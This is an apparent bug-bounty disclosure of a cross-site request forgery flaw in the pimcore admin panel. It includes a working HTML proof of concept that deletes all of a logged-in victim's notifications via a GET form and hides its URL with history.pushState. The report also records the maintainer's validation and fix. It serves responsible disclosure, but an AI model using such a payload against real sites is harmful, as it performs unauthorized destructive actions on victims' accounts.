Cross-Site Request Forgery (CSRF) in pimcore/pimcore

Valid

Reported on

Jul 30th 2021


✍️ Description

Your application does not have any CSRF protection, and you also set the SameSite attribute to Lax. Because browsers still send Lax cookies on cross-site top-level navigations (for example a form submitted with GET), any request that alters data over GET is, without doubt, vulnerable to CSRF.

First, open the HTML payload below while logged in to the admin panel and submit the form; you should then see that all notifications have been deleted.

🕵️‍♂️ Proof of Concept

// PoC.html
// The form has no method attribute, so it submits with GET; a Lax session
// cookie is still attached to this cross-site top-level navigation.

<html>
<body>
<!-- hide the attacker's URL in the victim's address bar and history -->
<script>history.pushState('', '', '/')</script>
<form action="https://x.pimcore.fun/admin/notification/delete-all">
<!-- &#95;dc decodes to _dc, the Ext JS cache-busting parameter; its value does not matter -->
<input type="hidden" name="&#95;dc" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

I tested this payload on both the stable and dev editions (on x.pimcore.fun).

💥 Impact

This vulnerability allows an attacker to delete all of a victim's notifications with a single click.

Occurrences

We have contacted a member of the pimcore team and are waiting to hear back 4 months ago
Bernhard Rusch validated this vulnerability 4 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Bernhard Rusch confirmed that a fix has been merged on 80713c 4 months ago
Bernhard Rusch has been awarded the fix bounty